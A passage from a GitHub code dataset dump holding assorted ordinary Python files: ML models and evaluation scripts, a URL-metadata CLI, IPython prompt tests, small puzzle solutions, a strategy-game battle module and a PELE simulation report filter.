print(labels)\n","repo_name":"tataganesh/Query-Efficient-Approx-to-improve-OCR","sub_path":"ocr_helper/gcloud_helper.py","file_name":"gcloud_helper.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"18489692410","text":"import transformers\r\nimport torch\r\nfrom torch import nn\r\nfrom torch.nn import CrossEntropyLoss\r\n\r\n\r\nclass PointerBert(nn.Module):\r\n #==========================================================#\r\n # Model that has an extra dot product layer above\r\n # Bert embedding. The index of final output tokens of which \r\n # score (the dot product with trained weight vector) is the \r\n # highest is the index of the target.\r\n #==========================================================#\r\n def __init__(self, bertmodel, max_token_len=128):\r\n super().__init__()\r\n self.bert = bertmodel\r\n self.hidden_size = bertmodel.config.hidden_size\r\n self.num_labels = max_token_len\r\n self.dropout = nn.Dropout(bertmodel.config.hidden_dropout_prob)\r\n self.dotproduct = nn.Linear(self.hidden_size, 1, bias=False)\r\n\r\n def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None, position_ids=None, head_mask=None, pointer_mask=None):\r\n outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=token_type_ids,\r\n attention_mask=attention_mask, head_mask=head_mask)\r\n \r\n last_hidden_state = outputs[0]\r\n last_hidden_state = self.dropout(last_hidden_state)\r\n\r\n logits = self.dotproduct(last_hidden_state)\r\n logits = torch.reshape(logits, (-1, self.num_labels))\r\n if pointer_mask is not None:\r\n # Tokens other than the special task tokens newly added\r\n # can be ignored. Therefore we make the scores of such tokens\r\n # very small.\r\n logits = logits * pointer_mask - (1-pointer_mask)*torch.finfo(torch.float32).max\r\n\r\n outputs = (logits,) + outputs[2:] \r\n\r\n if labels is not None:\r\n loss_fct = CrossEntropyLoss()\r\n loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))\r\n outputs = (loss,) + outputs\r\n\r\n return outputs # (loss), logits, (hidden_states), (attentions)\r\n\r\n","repo_name":"Hyungguk/tt-bert","sub_path":"PointerModel.py","file_name":"PointerModel.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41804527658","text":"from typing import List\nimport torch\nimport torch, torchvision\n\n# from models.load_pretrained_models import load_model\nimport matplotlib.pyplot as plt\nimport os\nfrom torchvision import transforms\nfrom torchvision import datasets\nimport time\nimport sys\nimport copy\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport torchvision.models as models\nimport numpy as np\nimport torchvision.models as models\nfrom torchinfo import summary\n\n\ndef k_accuracy(\n output: torch.Tensor, target: torch.Tensor, topk=(1,)\n) -> List[torch.FloatTensor]:\n with torch.no_grad():\n # ---- get the topk most likely labels according to your model\n # get the largest k \\in [n_classes] (i.e. the number of most likely probabilities we will use)\n maxk = max(\n topk\n ) # max number labels we will consider in the right choices for out model\n batch_size = target.size(0)\n\n # get top maxk indicies that correspond to the most likely probability scores\n # (note _ means we don't care about the actual top maxk scores just their corresponding indicies/labels)\n _, y_pred = output.topk(k=maxk, dim=1) # _, [B, n_classes] -> [B, maxk]\n y_pred = (\n y_pred.t()\n ) # [B, maxk] -> [maxk, B] Expects input to be <= 2-D tensor and transposes dimensions 0 and 1.\n\n # - get the credit for each example if the models predictions is in maxk values (main crux of code)\n # for any example, the model will get credit if it's prediction matches the ground truth\n # for each example we compare if the model's best prediction matches the truth. If yes we get an entry of 1.\n # if the k'th top answer of the model matches the truth we get 1.\n # Note: this for any example in batch we can only ever get 1 match (so we never overestimate accuracy <1)\n target_reshaped = target.view(1, -1).expand_as(\n y_pred\n ) # [B] -> [B, 1] -> [maxk, B]\n target_reshaped = target_reshaped.to(device)\n # compare every topk's model prediction with the ground truth & give credit if any matches the ground truth\n correct = (\n y_pred == target_reshaped\n ) # [maxk, B] were for each example we know which topk prediction matched truth\n # original: correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n # -- get topk accuracy\n list_topk_accs = [] # idx is topk1, topk2, ... etc\n for k in topk:\n # get tensor of which topk answer was right\n ind_which_topk_matched_truth = correct[:k] # [maxk, B] -> [k, B]\n # flatten it to help compute if we got it correct for each example in batch\n flattened_indicator_which_topk_matched_truth = (\n ind_which_topk_matched_truth.reshape(-1).float()\n ) # [k, B] -> [kB]\n # get if we got it right for any of our top k prediction for each example in batch\n tot_correct_topk = flattened_indicator_which_topk_matched_truth.float().sum(\n dim=0, keepdim=True\n ) # [kB] -> [1]\n # compute topk accuracy - the accuracy of the mode's ability to get it right within it's top k guesses/preds\n topk_acc = tot_correct_topk / batch_size # topk accuracy for entire batch\n list_topk_accs.append(topk_acc)\n return list_topk_accs # list of topk accuracies for entire batch [topk1, topk2, ... etc]\n\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nargs = {\"dataset\": sys.argv[1], \"weights\": sys.argv[2]}\nprint(f\"Arguments passed: dataset is {args['dataset']}, weights are {args['weights']}\")\n\ndata_transforms = {\n \"test\": transforms.Compose(\n [\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ]\n )\n}\n\nd_size = args[\"dataset\"]\n\n\ndata_dir = f\"heirarchy_data/{d_size}/wikipaintings_\"\nimage_datasets = {\n x: datasets.ImageFolder(data_dir + x, data_transforms[x]) for x in [\"test\"]\n}\n\ndataloaders = {\n x: torch.utils.data.DataLoader(\n image_datasets[x], batch_size=32, shuffle=True, num_workers=12\n )\n for x in [\"test\"]\n}\ndataset_sizes = {x: len(image_datasets[x]) for x in [\"test\"]}\nclasses = image_datasets[\"test\"].classes\nprint(classes)\n\nmodel = models.resnext101_32x8d(pretrained=True)\nnum_ftrs = model.fc.in_features\nmodel.fc = nn.Linear(num_ftrs, len(classes))\nweights = torch.load(args[\"weights\"], map_location=\"cpu\")\nmodel.load_state_dict(weights)\n\nmodel.eval()\nmodel.to(device)\n\ncorrect_pred = {classname: 0 for classname in classes}\ntotal_pred = {classname: 0 for classname in classes}\ntop_1_acc = 0\ntop_3_acc = 0\ntop_5_acc = 0\nbatch_count = 0\n\n# again no gradients needed\nwith torch.no_grad():\n for data in dataloaders[\"test\"]:\n # batch_count += 1\n images, labels = data\n images = images.to(device)\n outputs = model(images)\n for output, label in zip(outputs, labels):\n # print(output)\n # print(label)\n batch_count += 1\n top_k_accs = k_accuracy(outputs, labels, topk=(1, 3, 5))\n top_1_acc += top_k_accs[0][0]\n top_3_acc += top_k_accs[1][0]\n top_5_acc += top_k_accs[2][0]\n _, predictions = torch.max(outputs, 1)\n # collect the correct predictions for each class\n for label, prediction in zip(labels, predictions):\n if label == prediction:\n correct_pred[classes[label]] += 1\n total_pred[classes[label]] += 1\n\n # for batch in dataloaders[\"test\"]:\n # image,label = batch\n # output=model(image)\n # # print(output)\n\ntotal_correct = 0\npred_tot = 0\nprint(total_pred)\n# print accuracy for each class\nfor classname, correct_count in correct_pred.items():\n total_correct += correct_count\n pred_tot += total_pred[classname]\n accuracy = 100 * float(correct_count) / total_pred[classname]\n print(f\"Accuracy for class: {classname:5s} is {accuracy:.1f} %\")\n\ntotal_acc = 100 * total_correct / pred_tot\nk_1_acc = 100 * top_1_acc / batch_count\nk_3_acc = 100 * top_3_acc / batch_count\nk_5_acc = 100 * top_5_acc / batch_count\n\nprint(f\"Accuracy is {total_acc:.1f} %\")\n\nprint(f\"Accuracy for top 1: is {k_1_acc:.1f} %\")\nprint(f\"Accuracy for top 3: is {k_3_acc:.1f} %\")\nprint(f\"Accuracy for top 5: is {k_5_acc:.1f} %\")\n","repo_name":"sami-amer/art-style-classification","sub_path":"scripts/top-k-accuracy.py","file_name":"top-k-accuracy.py","file_ext":"py","file_size_in_byte":6477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70485110294","text":"import click\nfrom collections import OrderedDict\nfrom jinja2 import Environment, PackageLoader\nfrom merle.fetched_resource import FetchedResource\nfrom slugify import slugify as string_slugify\n\nDEFAULT_TEMPLATE = 'yaml.jinja2.txt'\nBRIEF_TEMPLATE = 'brief.yaml.jinja2.txt'\n\n\ndef dumper(obj, template_name=DEFAULT_TEMPLATE):\n env = Environment(loader=PackageLoader('merle', 'templates'),\n trim_blocks=True, lstrip_blocks=True)\n t = env.get_template(template_name)\n return t.render(f=obj)\n\n@click.group()\ndef cli():\n pass\n\n@cli.command()\n@click.argument('title')\ndef slugify(title):\n click.echo(string_slugify(title))\n\n@cli.command()\n@click.argument('url')\n@click.option('--anchor-link', '-a', is_flag=True)\n@click.option('--brief', '-b', is_flag=True)\n@click.option('--tabular', '-t', is_flag=True)\n@click.option('--markdown', '-m', is_flag=True)\n\ndef meta(url, tabular, markdown, anchor_link, brief):\n o = OrderedDict()\n f = FetchedResource(url)\n o['slug'] = f.slug\n o['url'] = f.returned_url\n o['title'] = f.title\n o['description'] = f.description\n o['fetched_at'] = f.fetched_at\n o['published_at'] = f.published_at\n o['authors'] = f.authors\n o['word_count'] = f.word_count\n o['excerpt'] = f.excerpt\n\n if tabular:\n click.echo(dumper(o), err=True)\n click.echo('\\t'.join(\n [o['title'], o['url'], o['description'], str(o['word_count'])]\n ))\n elif markdown:\n click.echo(\"\"\"[%s](%s)\"\"\" % (o['title'], o['url']))\n elif anchor_link:\n click.echo(\"\"\"%s\"\"\" % (o['url'], o['title']))\n elif brief:\n click.echo(dumper(o, BRIEF_TEMPLATE))\n else:\n click.echo(dumper(o))\n\n\n\n\nif __name__ == '__main__':\n cli()\n","repo_name":"dannguyen/merle","sub_path":"merle/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"6367514068","text":"from django import template\n#plotlyをinstalled_appに入れた\nimport plotly.graph_objects as go\nregister = template.Library()\n\n@register.simple_tag\ndef plotly(l1,l2):\n fig = go.Figure(\n go.Scatter(x=l1, y=l2,\n # layout=go.Layout(width=500, height=400)\n ))\n fig.update_layout(\n height=250,\n margin=dict(l=20,r=20,t=20,b=20)\n )\n \n return fig.to_html(fig)\n","repo_name":"taijusugahara/Django-","sub_path":"graph/graphApp/templatetags/plotly.py","file_name":"plotly.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"22223132787","text":"# -*- coding: utf-8\n\"\"\"Tests for prompt generation.\"\"\"\n\nimport unittest\n\nimport os\n\nfrom IPython.testing import tools as tt, decorators as dec\nfrom IPython.core.prompts import PromptManager, LazyEvaluate\nfrom IPython.testing.globalipapp import get_ipython\nfrom IPython.utils.tempdir import TemporaryWorkingDirectory\nfrom IPython.utils import py3compat\nfrom IPython.utils.py3compat import unicode_type\n\nip = get_ipython()\n\n\nclass PromptTests(unittest.TestCase):\n def setUp(self):\n self.pm = PromptManager(shell=ip, config=ip.config)\n \n def test_multiline_prompt(self):\n self.pm.in_template = \"[In]\\n>>>\"\n self.pm.render('in')\n self.assertEqual(self.pm.width, 3)\n self.assertEqual(self.pm.txtwidth, 3)\n \n self.pm.in_template = '[In]\\n'\n self.pm.render('in')\n self.assertEqual(self.pm.width, 0)\n self.assertEqual(self.pm.txtwidth, 0)\n \n def test_translate_abbreviations(self):\n def do_translate(template):\n self.pm.in_template = template\n return self.pm.templates['in']\n \n pairs = [(r'%n>', '{color.number}{count}{color.prompt}>'),\n (r'\\T', '{time}'),\n (r'\\n', '\\n')\n ]\n \n tt.check_pairs(do_translate, pairs)\n \n def test_user_ns(self):\n self.pm.color_scheme = 'NoColor'\n ip.ex(\"foo='bar'\")\n self.pm.in_template = \"In [{foo}]\"\n prompt = self.pm.render('in')\n self.assertEqual(prompt, u'In [bar]')\n\n def test_builtins(self):\n self.pm.color_scheme = 'NoColor'\n self.pm.in_template = \"In [{int}]\"\n prompt = self.pm.render('in')\n self.assertEqual(prompt, u\"In [%r]\" % int)\n\n def test_undefined(self):\n self.pm.color_scheme = 'NoColor'\n self.pm.in_template = \"In [{foo_dne}]\"\n prompt = self.pm.render('in')\n self.assertEqual(prompt, u\"In []\")\n\n def test_render(self):\n self.pm.in_template = r'\\#>'\n self.assertEqual(self.pm.render('in',color=False), '%d>' % ip.execution_count)\n \n @dec.onlyif_unicode_paths\n def test_render_unicode_cwd(self):\n with TemporaryWorkingDirectory(u'ünicødé'):\n self.pm.in_template = r'\\w [\\#]'\n p = self.pm.render('in', color=False)\n self.assertEqual(p, u\"%s [%i]\" % (py3compat.getcwd(), ip.execution_count))\n \n def test_lazy_eval_unicode(self):\n u = u'ünicødé'\n lz = LazyEvaluate(lambda : u)\n # str(lz) would fail\n self.assertEqual(unicode_type(lz), u)\n self.assertEqual(format(lz), u)\n \n def test_lazy_eval_nonascii_bytes(self):\n u = u'ünicødé'\n b = u.encode('utf8')\n lz = LazyEvaluate(lambda : b)\n # unicode(lz) would fail\n self.assertEqual(str(lz), str(b))\n self.assertEqual(format(lz), str(b))\n \n def test_lazy_eval_float(self):\n f = 0.503\n lz = LazyEvaluate(lambda : f)\n \n self.assertEqual(str(lz), str(f))\n self.assertEqual(unicode_type(lz), unicode_type(f))\n self.assertEqual(format(lz), str(f))\n self.assertEqual(format(lz, '.1'), '0.5')\n \n @dec.skip_win32\n def test_cwd_x(self):\n self.pm.in_template = r\"\\X0\"\n save = py3compat.getcwd()\n os.chdir(os.path.expanduser('~'))\n p = self.pm.render('in', color=False)\n try:\n self.assertEqual(p, '~')\n finally:\n os.chdir(save)\n \n","repo_name":"pyparallel/pyparallel","sub_path":"Lib/site-packages/ipython-4.0.0-py3.3.egg/IPython/core/tests/test_prompts.py","file_name":"test_prompts.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":579,"dataset":"github-code","pt":"67"} +{"seq_id":"7209564914","text":"from bayes_opt import BayesianOptimization\nimport numpy as np\nfrom src.run_trials import multiple_trials\n\ndef get_metric_to_max(dict_trial):\n return dict_trial['mean_p_val']\n\ndef run_hp_tuning(run_trial_fun, num_trials, arg_trial_fun,run_configuration):\n \n pbounds = {'diffusion_lambda': (0,1)}\n def black_box_function(diffusion_lambda):\n pair_model_params={'diffusion_lambda':diffusion_lambda, 'diff':True}\n dict_trial = multiple_trials(run_trial_fun, num_trials, pair_model_params,run_configuration,silence=True)\n return get_metric_to_max(dict_trial)\n\n \n optimizer = BayesianOptimization(\n f=black_box_function,\n pbounds=pbounds,\n random_state=4,\n )\n\n optimizer.maximize(\n init_points=5,\n n_iter=4,\n )\n\n return optimizer\n\n","repo_name":"floregol/template","sub_path":"src/hp_optim.py","file_name":"hp_optim.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20784792414","text":"# https://leetcode.cn/problems/remove-element/?envType=study-plan-v2&envId=top-interview-150\n# 27. 移除元素\n\nfrom typing import List\n\n# 从前往后遍历,如果==val,把最后一个元素放到最前面,数组长度减一\n# 时间32ms 击败98.11%, 内存15.67mb,击败42.73%\ndef removeElement(nums: List[int], val: int) -> int:\n i = 0\n while(i < len(nums)):\n if (nums[i] == val):\n if (i < len(nums) - 1):\n nums[i] = nums.pop()\n else:\n nums.pop()\n else:\n i += 1\n print(len(nums), nums)\n return len(nums)\n\n# 在上面的基础上,使用双指针,不做pop删除操作\n# 没有提升\ndef removeElement2(nums: List[int], val: int) -> int:\n i = 0\n j = len(nums) - 1\n while(i <= j):\n if (nums[i] == val):\n if (i < j):\n nums[i] = nums[j]\n j -= 1\n else:\n i += 1\n nums = nums[:j+1]\n print(len(nums), nums)\n return len(nums)\n\nremoveElement2([0,1,2,2,3,0,4,2], 2)\nremoveElement2([3,2,2,3], 3)\nremoveElement2([1], 1)","repo_name":"luoqaq/leetcode","sub_path":"classic150/removeElement.py","file_name":"removeElement.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34123942890","text":"from src.core.lcd_interface import LCD_Interface\nfrom src.web_interface.web_interface import WebApp\nfrom time import sleep\n\n\nclass Message(LCD_Interface):\n \"\"\"\n A class to display messages uploaded over a web page.\n \"\"\"\n def __init__(self, verbosity):\n super().__init__(verbosity)\n self.web_app = WebApp()\n self.web_app.run()\n\n def message_display(self):\n \"\"\"\n Grabs the message from the WebApp class and displays it on LCD.\n \"\"\"\n while True:\n print(\"here\")\n self.message = self.web_app.message\n\n self.write_centered(0, self.message)\n\n sleep(0.5)\n\n\nif __name__ == \"__main__\":\n msg_view = Message(1)\n msg_view.message_display()\n\n# TO-DO: Create seperate thread for hosting webpage!!!!!!","repo_name":"ZRay07/home-lcd-display","sub_path":"src/core/msg_view.py","file_name":"msg_view.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25416840533","text":"import cv2\nimport os.path\nfrom CSVmodule import *\n\n# Целевой год\nyear = 2019\n\n# Название csv-файла со старшим годом\nfilename = './data_politics_%d.csv' % year\n\n# Пока есть csv-файлы, ищем\nwhile os.path.exists(filename):\n print('Данные по \\\"' + filename + '\\\" загружены.\\n')\n\n # Чтение csv-файла\n data = csv_reader(filename)\n\n # Для каждой строчки в файле\n for row in data:\n if not os.path.exists(row[-1]):\n print(row)\n\n # Переход к следующему году\n year -= 1\n filename = './data_politics_%d.csv' % year\n\n","repo_name":"StarLightOver/DiplomIVT","sub_path":"Курсовой проект 4 Курс 1 Семестр/Web Scraping/tester_rw_CSV.py","file_name":"tester_rw_CSV.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5675993219","text":"import unittest\nimport TumOnc.context as ctx\nimport pandas as pd\n\nclass test_context(unittest.TestCase):\n def test_ctx3id(self):\n for c in ctx.ctx3_id:\n self.assertEqual(ctx.id_ctx3[ctx.ctx3_id[c]],c)\n self.assertEqual(ctx.ctx3_id['ACG'],3+4*2+16*0)\n\n def test_ctx5id(self):\n for c in ctx.ctx5_id:\n self.assertEqual(ctx.id_ctx5[ctx.ctx5_id[c]],c)\n self.assertEqual(ctx.ctx5_id['TACGT'],(3+4*2+16*0)*16+1+1*4)\n\n def test_get_ctx_bins(self):\n td = pd.DataFrame(['AGCTT','AGCTT','AGCTT','AGCTT',\n 'AGTGA','AGTGA',\n 'GCCGG',\n 'ACCGA','ACCGT','ACCGG','ACCGC'],columns=['ctx5'])\n td['ctx3'] = td['ctx5'].str[1:4]\n bins = ctx.get_ctx_bins(td)\n # print(td)\n # print(bins)\n self.assertEqual(bins.loc['AGCTT','c5id'],0)\n self.assertEqual(bins.loc['AGTGA','c5id'],1)\n self.assertGreaterEqual(bins.loc['GCCGG','c5id'],2)\n self.assertLessEqual(bins.loc['GCCGG','c5id'],6)\n self.assertGreater(bins.loc['GCCGT','c5id'],6)\n for c1 in 'AGCT':\n for c2 in 'AGCT':\n self.assertEqual(bins.loc[c1+'CCG'+c2,'c3id'],0)\n self.assertEqual(bins.loc[c1+'GCT'+c2,'c3id'],1)\n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fedxa/TumOnc","sub_path":"test_TumOnc/test_context.py","file_name":"test_context.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16242054836","text":"import math\n\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\n\n\ndef length_to_mask(length, max_len=None, dtype=None):\n assert len(length.shape) == 1\n\n if max_len is None:\n max_len = length.max().astype('int').item() # using arange to generate mask\n mask = paddle.arange(max_len, dtype=length.dtype).expand((len(length), max_len)) < length.unsqueeze(1)\n\n if dtype is None:\n dtype = length.dtype\n\n mask = paddle.to_tensor(mask, dtype=dtype)\n return mask\n\n\nclass Conv1d(nn.Layer):\n def __init__(\n self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n padding=\"same\",\n dilation=1,\n groups=1,\n bias=True,\n padding_mode=\"reflect\", ):\n \"\"\"_summary_\n\n Args:\n in_channels (int): intput channel or input data dimensions\n out_channels (int): output channel or output data dimensions\n kernel_size (int): kernel size of 1-d convolution\n stride (int, optional): strid in 1-d convolution . Defaults to 1.\n padding (str, optional): padding value. Defaults to \"same\".\n dilation (int, optional): dilation in 1-d convolution. Defaults to 1.\n groups (int, optional): groups in 1-d convolution. Defaults to 1.\n bias (bool, optional): bias in 1-d convolution . Defaults to True.\n padding_mode (str, optional): padding mode. Defaults to \"reflect\".\n \"\"\"\n super().__init__()\n\n self.kernel_size = kernel_size\n self.stride = stride\n self.dilation = dilation\n self.padding = padding\n self.padding_mode = padding_mode\n\n self.conv = nn.Conv1D(\n in_channels,\n out_channels,\n self.kernel_size,\n stride=self.stride,\n padding=0,\n dilation=self.dilation,\n groups=groups,\n bias_attr=bias, )\n\n def forward(self, x):\n if self.padding == \"same\":\n x = self._manage_padding(x, self.kernel_size, self.dilation, self.stride)\n else:\n raise ValueError(\"Padding must be 'same'. Got {self.padding}\")\n\n return self.conv(x)\n\n def _manage_padding(self, x, kernel_size: int, dilation: int, stride: int):\n L_in = x.shape[-1] # Detecting input shape\n padding = self._get_padding_elem(L_in, stride, kernel_size, dilation) # Time padding\n x = F.pad(x, padding, mode=self.padding_mode, data_format=\"NCL\") # Applying padding\n return x\n\n def _get_padding_elem(self,\n L_in: int,\n stride: int,\n kernel_size: int,\n dilation: int):\n if stride > 1:\n n_steps = math.ceil(((L_in - kernel_size * dilation) / stride) + 1)\n L_out = stride * (n_steps - 1) + kernel_size * dilation\n padding = [kernel_size // 2, kernel_size // 2]\n else:\n L_out = (L_in - dilation * (kernel_size - 1) - 1) // stride + 1\n\n padding = [(L_in - L_out) // 2, (L_in - L_out) // 2]\n\n return padding\n\n\nclass BatchNorm1d(nn.Layer):\n def __init__(\n self,\n input_size,\n eps=1e-05,\n momentum=0.9,\n weight_attr=None,\n bias_attr=None,\n data_format='NCL',\n use_global_stats=None, ):\n super().__init__()\n\n self.norm = nn.BatchNorm1D(\n input_size,\n epsilon=eps,\n momentum=momentum,\n weight_attr=weight_attr,\n bias_attr=bias_attr,\n data_format=data_format,\n use_global_stats=use_global_stats, )\n\n def forward(self, x):\n x_n = self.norm(x)\n return x_n\n\n\nclass TDNNBlock(nn.Layer):\n def __init__(\n self,\n in_channels,\n out_channels,\n kernel_size,\n dilation,\n activation=nn.ReLU, ):\n \"\"\"Implementation of TDNN network\n\n Args:\n in_channels (int): input channels or input embedding dimensions\n out_channels (int): output channels or output embedding dimensions\n kernel_size (int): the kernel size of the TDNN network block\n dilation (int): the dilation of the TDNN network block\n activation (paddle class, optional): the activation layers. Defaults to nn.ReLU.\n \"\"\"\n super().__init__()\n self.conv = Conv1d(in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n dilation=dilation, )\n self.activation = activation()\n self.norm = BatchNorm1d(input_size=out_channels)\n\n def forward(self, x):\n return self.norm(self.activation(self.conv(x)))\n","repo_name":"yeyupiaoling/VoiceprintRecognition-PaddlePaddle","sub_path":"ppvector/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"67"} +{"seq_id":"74907837332","text":"# Power of Cryptography\n\nimport math\n\n\ndef k(n, p):\n return round(math.pow(math.e, math.log(p) / n))\n\n\ndef main():\n while True:\n try:\n n = int(input())\n p = int(input())\n except EOFError:\n break\n else:\n print(k(n, p))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jrmanrique/codingproblems","sub_path":"uvaonlinejudge/python/p113.py","file_name":"p113.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"43923467629","text":"__author__ = 'Sam'\nfrom random import randint\nfrom src.common.GameWorld import *\n\ndef simpleBattle(army,city):\n #print \"Simple Battle Commencing\"\n armyPWR = army.size\n cityPWR = city.defense + city.importanceBehavior.importance()\n ###STRATEGY PATTERN####\n #print city.defense\n #print city.importanceBehavior.importance()\n\n total = randint(0,(armyPWR+cityPWR))\n winner = city\n loser = army\n if total > cityPWR:\n winner = army\n loser = city\n city.control = army\n winner.size = winner.powerState.setSize(total - cityPWR)\n #print city.name,\"has been taken!\"\n #print winner.name,\"now has \",winner.size,\"troops left\"\n else:\n army.size = 0\n #print loser.name,\"was unable to take the city\"\n\ndef siegeBattle(army1,army2,city):\n #print \"Siege Battle Commencing\"\n if army1.control == army2.control:\n raise TypeError(\"Armies are on the same team\")\n if city.control == army1:\n defender = army1\n attacker = army2\n else:\n defender = army2\n attacker = army1\n defensePWR = defender.size + city.defense + city.importanceBehavior.importance()\n attackPWR = attacker.size\n total = randint(0,(defensePWR+attackPWR))\n winner = defender\n loser = attacker\n if total > defensePWR:\n winner = attacker\n loser = defender\n winner.size = winner.powerState.setSize(total-loser.size)\n loser.size = 0\n #print loser.name,\"has been defeated, \",city.name,\"has been taken!\"\n #print winner.name, \"now has \", winner.size, \"troops left\"\n city.control = winner\n else:\n loser.size = 0\n winner.size = winner.powerState.setSize(total)\n #print loser.name,\"has been defeated\"\n #print winner.name, \"now has \", winner.size, \"troops left\"\n\ndef cityBattle(army,city):\n #print \"City Battle Commencing\"\n armyPWR = army.size\n cityPWR = city.defense\n total = randint(0,(armyPWR+cityPWR))\n winner = city\n loser = army\n if total > cityPWR:\n winner = army\n loser = city\n city.control = army\n winner.size = winner.powerState.setSize(total - cityPWR)\n #print city.name,\"has been taken!\"\n #print winner.name,\"now has \",winner.size,\"troops left\"\n else:\n army.size = 0\n #print loser.name,\"was unable to take the city\"\n\n\n\n\n\n\n","repo_name":"satello/work-samples","sub_path":"University of Oregon Coursework/Intro to Computer Science/GOT Game/src/common/battleDriver.py","file_name":"battleDriver.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2818650938","text":"# -*- coding: utf-8 -*-\n\n# Global imports\nfrom __future__ import unicode_literals\nimport os\nimport glob\nimport argparse as ap\nimport pandas as pd\nimport numpy as n\n\n# Local imports\nfrom PELEParseReports import *\n\n# Script information\n__author__ = \"Sergi Rodà\"\n__license__ = \"MIT\"\n__version__ = \"1.0.1\"\n__maintainer__ = \"Sergi Rodà\"\n__email__ = \"sergi.rodallordes@bsc.es\"\n\n# Functions\ndef parseArgs():\n \"\"\"\n Parse arguments from command-line\n\n RETURNS\n -------\n reports : string\n list of report files to look for data\n output_path : string\n output directory where the csv file will be saved\n column : list of indices\n list of column indices\n \"\"\"\n\n parser = ap.ArgumentParser(description='Script that returns a csv file with the mean of the numerical \\\n metrics of the reports file from a PELE simulation')\n optional = parser._action_groups.pop()\n required = parser.add_argument_group('required arguments')\n required.add_argument(\"-i\", \"--input\", required=True, metavar=\"FILE\",\n type=str, nargs='*', help=\"path to report files\")\n optional.add_argument(\"-o\", \"--output\", metavar=\"PATH\", type=str,\n help=\"output path to save figure\", default=\"PELE_results\")\n optional.add_argument(\"-C\",\"--column\", metavar=\"LIST\",type=str,\n nargs='*',help=\"index of the column where the filtering will be applied\")\n parser._action_groups.append(optional)\n args = parser.parse_args()\n\n reports = parseReports(args.input, parser)\n\n output_path, column = args.output, args.column\n\n if column is not None:\n column = [int(i)-1 for i in column]\n\n return reports, output_path, column\n\n\ndef Storeresults(reports,CE, output_path):\n \"\"\"\n Take the PELE simulation report files and returns the filtered report files\n\n OUTPUT\n ------\n filtered report files according to some specified filters in some columns\n \"\"\"\n\n if not os.path.exists(os.path.join(os.getcwd(), \"Filtered_reports\")):\n os.mkdir(os.path.join(os.getcwd(), \"Filtered_reports\"))\n Report_path= os.path.join(os.getcwd(), \"Filtered_reports\")\n\n for i,report in enumerate(reports):\n df = pd.read_csv(report,sep=\" \")\n\n df_aux = df[(df[df.columns[CE[0]]].between(0,100)) & (df[df.columns[CE[1]]].between(-30,-10))]\n df_aux.to_csv(os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\"))\n\n report = open(os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\"),\"r\")\n report_def = open(os.path.join(Report_path,output_path+\"f_\"+str(i+1)+\".out\"),\"w\")\n\n for line in report:\n report_def.write(\" \".join(line.split(\",\")[1:]))\n\n os.system(\"rm {}\".format(os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\")))\n os.system(\"mv {} {}\".format(os.path.join(Report_path,output_path+\"f_\"+str(i+1)+\".out\"),\n os.path.join(Report_path,output_path+\"_\"+str(i+1)+\".out\")))\n\n\ndef main():\n \"\"\"\n Main function\n\n It is called when this script is the main program called by the interpreter\n \"\"\"\n\n # Parse command-line arguments\n reports, output_path, catalytic_event = parseArgs()\n\n # Store the filtered report files\n Storeresults(reports,catalytic_event, output_path)\n\n\nif __name__ == \"__main__\":\n \"\"\"Call the main function\"\"\"\n main()\n","repo_name":"SergiR1996/PELEAnalysis-Processing","sub_path":"PELEAnalysis-Processing/PELE_scripts/PELEFilterResults.py","file_name":"PELEFilterResults.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"15500196023","text":"# Write your code here\nimport math\nfrom collections import defaultdict\n \nn, q = map(int, input().strip().split())\narr = list(map(int, input().strip().split()))\n \nfactors = defaultdict(list)\nfor 